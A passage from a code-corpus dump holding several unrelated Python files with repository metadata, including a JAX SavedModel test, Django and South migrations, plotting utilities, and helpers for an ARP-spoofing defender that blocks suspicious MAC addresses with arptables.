plt.savefig("images/g_loss.jpg")
|
[
"kurchetinagaganeshsing@gmail.com"
] |
kurchetinagaganeshsing@gmail.com
|
54fc4b571d0a019cf447302ece1dbbcbd640f3f2
|
c075d28fe2f947b62cdc6b824a9619b3da249a9b
|
/Message.py
|
e6570ebddb157dcd34c40f70651f5fd8608fe182
|
[] |
no_license
|
ahiaplee/REST_API
|
274554df54ebb8f40e089ddbd6e3e4a35715e217
|
d873893a434652b889d1db3a7d0b4b10d82b2488
|
refs/heads/master
| 2023-07-11T14:50:27.429509
| 2021-08-23T09:33:17
| 2021-08-23T09:33:17
| 398,561,701
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
""" Helper function to construct message of object
"""
def Message(success, msg, data=None):
    """Build a standard API response envelope.

    Args:
        success: flag indicating whether the operation succeeded.
        msg: outcome description; always coerced to str.
        data: optional payload, passed through unchanged (None stays None).

    Returns:
        dict with "success", "message" and "data" keys.
    """
    payload = None if data is None else data
    return {"success": success, "message": str(msg), "data": payload}
|
[
"anghiaplee@gmail.com"
] |
anghiaplee@gmail.com
|
d2551746212128238ed588764eaf2295cdb5161e
|
e4831f5a12c5b96473dd1717d1c4f194d7eef211
|
/jax/experimental/jax_to_tf/tests/savedmodel_test.py
|
b52ddf209cf57e43650933bf1893c17ba9f9c151
|
[
"Apache-2.0"
] |
permissive
|
qiuminxu/jax
|
9fe52053d49f83638a1a85325e8bb99f3143f1f5
|
563b65e8c505cfdbf0184dd55f40319e286137fd
|
refs/heads/master
| 2023-01-31T06:23:52.743231
| 2020-06-08T22:11:49
| 2020-06-08T22:11:49
| 270,889,360
| 0
| 0
|
NOASSERTION
| 2020-06-09T03:00:17
| 2020-06-09T03:00:16
| null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from absl.testing import absltest
import jax
import jax.numpy as jnp
import numpy as np
import tensorflow as tf # type: ignore[import]
from jax.experimental import jax_to_tf
from jax.experimental.jax_to_tf.tests import tf_test_util
from jax.config import config
config.parse_flags_with_absl()
class SavedModelTest(tf_test_util.JaxToTfTestCase):
  """Checks that a jax_to_tf-converted function survives a SavedModel round trip."""

  def testSavedModel(self):
    # A simple jitted JAX function to convert.
    f_jax = jax.jit(lambda x: jnp.sin(jnp.cos(x)))
    model = tf.Module()
    # Wrap the converted function with a concrete input signature so it can
    # be serialized into the SavedModel.
    model.f = tf.function(jax_to_tf.convert(f_jax),
                          input_signature=[tf.TensorSpec([], tf.float32)])
    x = np.array(0.7)
    self.assertAllClose(model.f(x), f_jax(x))
    # Roundtrip through saved model on disk.
    model_dir = os.path.join(absltest.get_default_test_tmpdir(), str(id(model)))
    tf.saved_model.save(model, model_dir)
    restored_model = tf.saved_model.load(model_dir)
    # The deserialized function must agree with the original JAX computation.
    self.assertAllClose(restored_model.f(x), f_jax(x))
# Allow running this test module directly via absl's test runner.
if __name__ == "__main__":
  absltest.main()
|
[
"noreply@github.com"
] |
qiuminxu.noreply@github.com
|
6af69148a5b1b6b792f560886f4ce0b71ad1b082
|
d557289b9836dd1a426f15f0a463439b98dadaa3
|
/mergeArraySort.py
|
cd3e3acd8d3274061443b2958c29f2ba70769fd0
|
[] |
no_license
|
SmartChandru/GUVI-code-kata
|
dced9cd3fa37ee0e89eb2a0c79899744e353eb0a
|
01c136d72236c968f98f608eb10606cd5fdf5d26
|
refs/heads/master
| 2020-07-11T05:54:43.508259
| 2019-12-08T11:24:17
| 2019-12-08T11:24:17
| 204,460,960
| 1
| 0
| null | 2019-09-05T11:41:05
| 2019-08-26T11:27:06
|
Python
|
UTF-8
|
Python
| false
| false
| 249
|
py
|
# Read n lines of space-separated integers, merge them into one list, sort
# ascending, and print the values separated by single spaces.
n = int(input())
a = []
for _ in range(n):
    a.extend(map(int, input().split()))
# PERF: the original hand-rolled exchange sort was O(m^2); the built-in
# Timsort is O(m log m) and produces exactly the same ascending order.
a.sort()
# Print each value followed by a space, matching the original output format.
for value in a:
    print(value, end=" ")
|
[
"noreply@github.com"
] |
SmartChandru.noreply@github.com
|
a1f12ca70ae451570ddc939d19e4b36b84558e06
|
6c2ddf52efccdfa15ce073da0e74d3352d5108c4
|
/idact/detail/config/validation/validate_scratch.py
|
b7e377e1a140ad61d79142b999a2e7a703c9e2ef
|
[
"MIT"
] |
permissive
|
intdata-bsc/idact
|
4bff248e644629b7ec634b282d790c305fc6703d
|
54cb65a711c145351e205970c27c83e6393cccf5
|
refs/heads/develop
| 2020-05-17T20:33:52.890970
| 2019-12-26T00:03:58
| 2019-12-26T00:03:58
| 183,949,088
| 0
| 0
|
MIT
| 2019-12-26T00:03:59
| 2019-04-28T19:18:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
"""This module contains a function for validating a scratch config entry."""
import re
from idact.detail.config.validation.validation_error_message import \
validation_error_message
# Human-readable description included in validation error messages.
VALID_SCRATCH_DESCRIPTION = 'Non-empty absolute path, or environment' \
                            ' variable name.'
# NOTE(review): because `|` has the lowest precedence, this pattern is
# effectively `^(/.*)` OR `(\$[A-Za-z][A-Za-z0-9]*)$` -- the end anchor only
# applies to the environment-variable alternative, and variable names do not
# allow underscores. Presumably intentional; confirm before tightening.
VALID_SCRATCH_REGEX = r"^(/.*)|(\$[A-Za-z][A-Za-z0-9]*)$"  # noqa, pylint: disable=line-too-long
__COMPILED = re.compile(pattern=VALID_SCRATCH_REGEX)
def validate_scratch(scratch) -> str:
    """Returns the parameter if it's a valid scratch config entry, otherwise
       raises an exception.

       A valid entry is a string that is either an absolute path (starts
       with '/') or an environment variable reference (e.g. '$SCRATCH').

       :param scratch: Object to validate.

       :raises TypeError: On wrong type.

       :raises ValueError: On regex mismatch.
    """
    if not isinstance(scratch, str):
        raise TypeError(validation_error_message(
            label='scratch',
            value=scratch,
            expected=VALID_SCRATCH_DESCRIPTION,
            regex=VALID_SCRATCH_REGEX))
    # re.match anchors at the start of the string; due to the alternation in
    # the pattern, only the env-var branch is also end-anchored.
    if not __COMPILED.match(scratch):
        raise ValueError(validation_error_message(
            label='scratch',
            value=scratch,
            expected=VALID_SCRATCH_DESCRIPTION,
            regex=VALID_SCRATCH_REGEX))
    return scratch
|
[
"matt.garstka@gmail.com"
] |
matt.garstka@gmail.com
|
4a5ece018daaf2a028be2d2641cdeba80fe55294
|
483003faa1de6b564b601addbe4c27642b6abb9b
|
/app/core/migrations/0004_ingredient.py
|
f5e6218c5327eb8b9972e60caeff229f553c78fd
|
[
"MIT"
] |
permissive
|
AncientDemagogue/recipe-app-api
|
b177ecb273ee1cd026244711dc0cf5d0f09c9c41
|
908a7d16b9ff3ae031760d7752ea3392a4030c94
|
refs/heads/master
| 2020-09-07T02:39:23.967655
| 2019-11-19T09:05:48
| 2019-11-19T09:05:48
| 220,632,446
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
# Generated by Django 2.1.14 on 2019-11-13 13:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: adds the Ingredient model (name + owning user)."""

    dependencies = [
        ('core', '0003_tag'),
    ]

    operations = [
        # Ingredients are owned by a user and deleted with them (CASCADE).
        migrations.CreateModel(
            name='Ingredient',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"domagojbakota@gmail.com"
] |
domagojbakota@gmail.com
|
b025b0483c8f7cb1cb518a99a5f5b1114bcfa738
|
64647c6dffa78246cb0ef80091c2a1461d100e1f
|
/pomdp_problems/util.py
|
27a06e4cff5114d31f240a92985c802a33b4597a
|
[
"MIT"
] |
permissive
|
Semanti1/pomdp_findit
|
28543519dbc30f864d15b9c682470e14483732c6
|
b96c1c06aab4b485fa005654cf6438ff63718083
|
refs/heads/main
| 2023-07-20T20:18:34.632833
| 2021-09-02T15:58:49
| 2021-09-02T15:58:49
| 397,013,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,786
|
py
|
import matplotlib.pyplot as plt
from matplotlib.collections import PolyCollection
import numpy as np
import matplotlib.lines as lines
import math
# Convenient color utilities
def rgb_to_hex(rgb):
    """Convert an (r, g, b) tuple of 0-255 ints to a '#rrggbb' hex string."""
    return f"#{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}"
def hex_to_rgb(hx):
    """Parse a '#rrggbb' string (exactly 7 chars) into an (r, g, b) tuple.

    Raises ValueError when the string is not 7 characters long or contains
    non-hex digits.
    """
    if len(hx) != 7:
        raise ValueError("Hex must be #------")
    digits = hx[1:]  # drop the leading '#'
    return tuple(int(digits[i:i + 2], 16) for i in range(0, 6, 2))
def inverse_color_rgb(rgb):
    """Return the complementary color: each of the three channels -> 255 - value."""
    red, green, blue = rgb
    return (255 - red, 255 - green, 255 - blue)
def inverse_color_hex(hx):
    """Complement of a '#rrggbb' color, returned as an (r, g, b) tuple."""
    return inverse_color_rgb(hex_to_rgb(hx))
def linear_color_gradient(rgb_start, rgb_end, n, normalize=False):
    """Return n colors linearly interpolated from rgb_start to rgb_end.

    Args:
        rgb_start: starting (r, g, b) color, channels in 0-255.
        rgb_end: ending (r, g, b) color, channels in 0-255.
        n: number of colors to produce (n >= 1); both endpoints included.
        normalize: if True, scale every channel into 0.0-1.0 floats.

    Returns:
        List of n (r, g, b) tuples.

    Bug fix: the original never normalized the first color, so with
    normalize=True the returned list mixed 0-255 and 0.0-1.0 values.
    """
    if normalize:
        start = tuple(rgb_start[i] / 255.0 for i in range(3))
    else:
        start = rgb_start
    colors = [start]
    for t in range(1, n):
        color = tuple(
            rgb_start[i] + float(t)/(n-1)*(rgb_end[i] - rgb_start[i])
            for i in range(3)
        )
        if normalize:
            color = tuple(color[i] / 255.0 for i in range(3))
        colors.append(color)
    return colors
def rgb_to_grayscale(rgb):
    """Apply ITU-R 601 luma weights to each channel.

    Note: returns the per-channel weighted tuple, not the summed luminance.
    """
    red, green, blue = rgb
    return (0.2989 * red, 0.5870 * green, 0.1140 * blue)
# colors
def lighter(color, percent):
    '''Blend an RGB color toward white by `percent` (0.0 = unchanged, 1.0 = white).

    Assumes channels between (0, 0, 0) and (255, 255, 255); returns a numpy array.
    '''
    base = np.array(color)
    toward_white = np.array([255, 255, 255]) - base
    return base + toward_white * percent
# Plot polygons with colors
def plot_polygons(verts, colors, ax=None, edgecolor=None):
    """Add a PolyCollection of `verts` with face colors `colors` to `ax`.

    `verts` is a sequence (verts0, verts1, ...) where each verts_i is a
    sequence of (x, y) tuples or an (nv, 2) array; `colors` is a matching
    sequence of hex color strings. When `ax` is None, a new subplot is
    created in the current figure.
    """
    if ax is None:
        ax = plt.gcf().add_subplot(1, 1, 1)
    collection = PolyCollection(verts)
    collection.set_edgecolor(edgecolor)
    collection.set_facecolor(colors)
    ax.add_collection(collection)
    ax.set_xlabel('X axis')
    ax.set_ylabel('Y axis')
def plot_line(ax, p1, p2,
              linewidth=1, color='black', zorder=0, alpha=1.0, linestyle="-"):
    """Draw a straight segment from `p1` to `p2` onto `ax`."""
    (x1, y1), (x2, y2) = p1, p2
    segment = lines.Line2D([x1, x2], [y1, y2],
                           linewidth=linewidth, color=color, zorder=zorder,
                           alpha=alpha, linestyle=linestyle)
    ax.add_line(segment)
def plot_circle(ax, center, radius, color="blue",
                fill=False, zorder=0, linewidth=0,
                edgecolor=None, label_text=None,
                alpha=1.0, text_color="white"):
    """Draw a circle at `center`, optionally with a centered, outlined label.

    Bug fix: the original referenced `path_effects` without importing it,
    raising NameError whenever `label_text` was supplied. The module is now
    imported locally where it is needed.
    """
    px, py = center
    circ = plt.Circle((px, py), radius, facecolor=color, fill=fill,
                      zorder=zorder, linewidth=linewidth, edgecolor=edgecolor, alpha=alpha)
    ax.add_artist(circ)
    if label_text:
        import matplotlib.patheffects as path_effects
        text = ax.text(px, py, label_text, color=text_color,
                       ha='center', va='center', size=7, weight='bold')
        # Black stroke behind the text keeps it legible on any fill color.
        text.set_path_effects([path_effects.Stroke(linewidth=1, foreground='black'),
                               path_effects.Normal()])
# functional utilitiesx
def remap(oldval, oldmin, oldmax, newmin, newmax):
    """Linearly map `oldval` from [oldmin, oldmax] into [newmin, newmax]."""
    scaled = ((oldval - oldmin) * (newmax - newmin)) / (oldmax - oldmin)
    return scaled + newmin
# Utility functions
def euclidean_dist(p1, p2):
    """Euclidean distance between two equal-length points."""
    squared_diffs = [(a - b) ** 2 for a, b in zip(p1, p2)]
    return math.sqrt(sum(squared_diffs))
def to_rad(deg):
    """Convert an angle in degrees to radians (deg * pi / 180)."""
    radians = deg * math.pi / 180.0
    return radians
def in_range(val, rang):
    """Return True if `val` lies in the closed interval `rang` = (low, high)."""
    low, high = rang[0], rang[1]
    return low <= val <= high
|
[
"renia.basu1@gmail.com"
] |
renia.basu1@gmail.com
|
1b8c780b7f5c7f81ba7923dd10aed1db62b4fc37
|
3385e4c8bd568d72e891ebcb3914f42bdd844e7d
|
/learndjango/myapp/urls.py
|
fd2fd618e8de8ab00092cfe1693f4c722cef5554
|
[] |
no_license
|
elay-maharramli/Learn-Django
|
832518952167e4d0f28888cb31170e45973cb7b9
|
d1b9f28c848e49d306408c70f294f26b7394d26a
|
refs/heads/master
| 2022-05-29T00:37:19.666525
| 2020-04-26T05:59:41
| 2020-04-26T05:59:41
| 258,520,859
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 97
|
py
|
from django.urls import path
from . import views
urlpatterns = [
    # Root URL of this app serves the contact view.
    path('', views.contact),
]
|
[
"36122259+Maharramli@users.noreply.github.com"
] |
36122259+Maharramli@users.noreply.github.com
|
bd148516b05561d6e3d1ad496de909ab866d8ba6
|
29ec35b43d4eb15c603df3efa90f14cc0467b403
|
/utility/utils.py
|
a43237c9d50352074ee1fdc198251276cb57f6a4
|
[] |
no_license
|
zhongyr/CPSC852-arp-defender
|
92f906637928b4c05da178e3c4f4269f850e2916
|
1e529fc90401ea70fc341a2d20ec51544949d763
|
refs/heads/master
| 2020-09-14T03:46:42.785333
| 2019-12-04T08:44:07
| 2019-12-04T08:44:07
| 223,007,537
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,431
|
py
|
# -*- encoding: utf-8 -*-
import netifaces
import binascii
import socket
from os import system
def get_iface_info(iface_):
    """
    Look up the MAC and IPv4 address of a network interface.

    :param iface_: name of interface (e.g. 'eth0')
    :return: dict with "HW address", "IP address" and "iface" keys
    """
    addresses = netifaces.ifaddresses(iface_)
    return {
        "HW address": addresses[netifaces.AF_LINK][0]["addr"],
        "IP address": addresses[netifaces.AF_INET][0]["addr"],
        "iface": iface_,
    }
def mac_str2bin(mac_str_):
    """
    Convert a colon-separated MAC string to its raw bytes.

    :param mac_str_: '1a:2b:3c:4d:5e:6f'
    :return: b'\\x1a\\x2b\\x3c\\x4d\\x5e\\x6f'
    """
    hex_digits = mac_str_.replace(':', '')
    return binascii.unhexlify(hex_digits)
def mac_bytes2str(mac_bytes_):
    """
    Format a 6-byte MAC address as a colon-separated string.

    :param mac_bytes_: bytes object (first 6 bytes are used)
    :return: 'aa:bb:cc:dd:ee:ff'
    """
    raw = mac_bytes_.hex()
    pairs = (raw[i:i + 2] for i in range(0, 12, 2))
    return ':'.join(pairs)
def create_raw_socket(iface_):
    """
    Create a raw packet socket bound to `iface_` that receives only ARP frames.

    Requires root privileges and a Linux system (PF_PACKET).

    :param iface_: interface name
    :return: socket file descriptor
    """
    _ETH_P_ARP = 0x0806  # EtherType for ARP (host byte order; htons below)
    raw_socket = socket.socket(socket.PF_PACKET,  # use PF_PACKET for low-level networking interface
                               socket.SOCK_RAW,  # set type to raw socket
                               socket.htons(_ETH_P_ARP))  # we are only interested in ARP packets
    raw_socket.bind((iface_, 0))  # bind interface, use reserved port number 0
    return raw_socket
def compare_mac_addr(entry, rx_mac):
    """
    Check whether the MAC recorded in an entry matches the MAC from a response.

    :param entry: dict containing an "HW address" key
    :param rx_mac: MAC address string from the received packet
    :return: True on match, False otherwise
    """
    return entry["HW address"] == rx_mac
# Entries that failed validation; each one is also mirrored into arptables.
blacklist = []
def add_to_blacklist(entry):
    """
    if an entry failed in validation, add it to blacklist.
    We use arptables as our blacklist
    :param entry: src_mac_address
    :return: None
    """
    blacklist.append(entry)
    # NOTE(review): the MAC is interpolated directly into a shell command.
    # It presumably comes from parsed packet bytes and is constrained to hex
    # pairs, but verify upstream sanitization -- a subprocess.run([...]) list
    # invocation would be safer than os.system with string formatting.
    system("arptables -A INPUT --src-mac {} -j DROP".format(entry["HW address"]))
def CNTC_Handler(signum, frame):
    """
    Ctrl-C (SIGINT) handler: clear all entries from arptables (the blacklist)
    and terminate the process.

    :param signum: signal number (unused)
    :param frame: current stack frame (unused)
    :return: None (never returns; exits the process with status 0)
    """
    print("\nclear blacklist before exit")
    system("arptables -F")
    print("exit arp defender")
    exit(0)
|
[
"yang_hanjie@163.com"
] |
yang_hanjie@163.com
|
cdb7f1b397956cb5a6c3293cce165a43df74e120
|
3e4b8fe54f11bf36f3615c21fdc1dca0ed00fe72
|
/month04/spider/day01/job/01_job.py
|
78867664d1c5536f2df7e72e0fcae9e195b7f49b
|
[] |
no_license
|
leinian85/year2019
|
30d66b1b209915301273f3c367bea224b1f449a4
|
2f573fa1c410e9db692bce65d445d0543fe39503
|
refs/heads/master
| 2020-06-21T20:06:34.220046
| 2019-11-04T06:37:02
| 2019-11-04T06:37:02
| 197,541,549
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
import re
import hashlib  # NOTE(review): unused in this script; safe to drop if nothing else imports it


# Sample document: two "animal" blocks, each with a title and a content body.
html = '''
<div class="animal">
<p class="name">
<a title="Tiger"></a>
</p>
<p class="content">
Two tigers two tigers run fast
</p>
</div>
<div class="animal">
<p class="name">
<a title="Rabbit"></a>
</p>
<p class="content">
Small white rabbit white and white
</p>
</div>
'''

# BUG FIX: removed dead statements `a = '123'` / `a.rstrip()` -- the rstrip()
# result was discarded, so they had no effect at all.

# re.S lets '.' match newlines so each pattern can span a whole <div> block.
pattern = re.compile('<div class="animal">.*?title="(.*?)".*?<p class="content">(.*?)</p>', re.S)
r_list = pattern.findall(html)
# Strip the surrounding whitespace from every content body.
r_list_new = [(name, content.strip()) for name, content in r_list]
print(r_list_new)
for name, content in r_list_new:
    # NOTE(review): both labels print "动物名称" (animal name); the second was
    # probably meant to be a "content" label -- kept as-is to preserve output.
    print("动物名称 :", name)
    print("动物名称 :", content)
    print("*" * 40)
|
[
"42737521@qq.com"
] |
42737521@qq.com
|
bba070b319caee484ed5feee463a97aa3994144a
|
60f6d5804522e7b3ba75a989afe683456d9fa6cf
|
/manage.py
|
016e52226f066271d834ee762b0d7b0d3f2d613c
|
[] |
no_license
|
minzey/jogging-tracker
|
b773aa4ddbee3912592fd86534b310d19cd67874
|
fe2d8da65ed5812e3752f5c03873016e4fbd49e9
|
refs/heads/master
| 2023-07-08T16:12:51.847514
| 2021-08-09T14:11:07
| 2021-08-09T14:11:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 671
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks via Django's command-line machinery."""
    # Fall back to the project settings module unless the caller set one.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'fitness_project.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
|
[
"swati.13103444@gmail.com"
] |
swati.13103444@gmail.com
|
f931dd724fcf84d43040507097344a26d4c52a9c
|
08edc5ed6c15f5c379aeb4c8505dfa28f008c337
|
/app/whwn/migrations/0025_auto__del_field_team_point__add_field_team_latitude__add_field_team_lo.py
|
38ecdb4a44e1da15902f5a9b76e925d223c3f80e
|
[] |
no_license
|
wehaveweneed/whwn-dep
|
0795ccd55e837493bf345306a7ae4c7a919ebe8a
|
2535c1fe1ae76a36f24a1c3b32b76f72fc59b49d
|
refs/heads/master
| 2021-01-01T18:55:26.662249
| 2013-08-27T05:58:49
| 2013-08-27T05:58:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,657
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration: replaces the GIS PointField ('point') on Team, Item and
    UserProfile with plain latitude/longitude DecimalFields.

    NOTE(review): the db.delete_column / db.add_column calls for 'point' are
    commented out in both directions, so the GIS columns are never actually
    dropped or restored by this migration -- presumably intentional; confirm.
    """

    def forwards(self, orm):
        # Deleting field 'Team.point'
        # db.delete_column('whwn_team', 'point')

        # Adding field 'Team.latitude'
        db.add_column('whwn_team', 'latitude',
                      self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
                      keep_default=False)

        # Adding field 'Team.longitude'
        db.add_column('whwn_team', 'longitude',
                      self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
                      keep_default=False)

        # Deleting field 'Item.point'
        # db.delete_column('whwn_item', 'point')

        # Adding field 'Item.latitude'
        db.add_column('whwn_item', 'latitude',
                      self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
                      keep_default=False)

        # Adding field 'Item.longitude'
        db.add_column('whwn_item', 'longitude',
                      self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
                      keep_default=False)

        # Deleting field 'UserProfile.point'
        # db.delete_column('whwn_userprofile', 'point')

        # Adding field 'UserProfile.latitude'
        db.add_column('whwn_userprofile', 'latitude',
                      self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
                      keep_default=False)

        # Adding field 'UserProfile.longitude'
        db.add_column('whwn_userprofile', 'longitude',
                      self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=8, decimal_places=3, blank=True),
                      keep_default=False)

    def backwards(self, orm):
        # Adding field 'Team.point'
        # db.add_column('whwn_team', 'point',
        #               self.gf('django.contrib.gis.db.models.fields.PointField')(null=True, blank=True),
        #               keep_default=False)

        # Deleting field 'Team.latitude'
        db.delete_column('whwn_team', 'latitude')

        # Deleting field 'Team.longitude'
        db.delete_column('whwn_team', 'longitude')

        # Adding field 'Item.point'
        # db.add_column('whwn_item', 'point',
        #               self.gf('django.contrib.gis.db.models.fields.PointField')(null=True, blank=True),
        #               keep_default=False)

        # Deleting field 'Item.latitude'
        db.delete_column('whwn_item', 'latitude')

        # Deleting field 'Item.longitude'
        db.delete_column('whwn_item', 'longitude')

        # Adding field 'UserProfile.point'
        # db.add_column('whwn_userprofile', 'point',
        #               self.gf('django.contrib.gis.db.models.fields.PointField')(null=True, blank=True),
        #               keep_default=False)

        # Deleting field 'UserProfile.latitude'
        db.delete_column('whwn_userprofile', 'latitude')

        # Deleting field 'UserProfile.longitude'
        db.delete_column('whwn_userprofile', 'longitude')

    # Frozen ORM snapshot used by South during this migration; auto-generated.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'whwn.item': {
            'Meta': {'object_name': 'Item'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
            'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '3', 'blank': 'True'}),
            'possessor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
            'quantity': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'requested': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'sku': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.ItemSKU']"}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
        },
        'whwn.itemcategory': {
            'Meta': {'object_name': 'ItemCategory'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
        },
        'whwn.itemsku': {
            'Meta': {'unique_together': "(('upc', 'team'),)", 'object_name': 'ItemSKU'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.ItemCategory']"}),
            'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
            'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.Team']"}),
            'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
        },
        'whwn.message': {
            'Meta': {'object_name': 'Message'},
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
            'contents': ('django.db.models.fields.TextField', [], {'default': "''"}),
            'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'flagged': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['whwn.Team']"}),
            'updated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
        },
        'whwn.team': {
            'Meta': {'object_name': 'Team'},
            'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
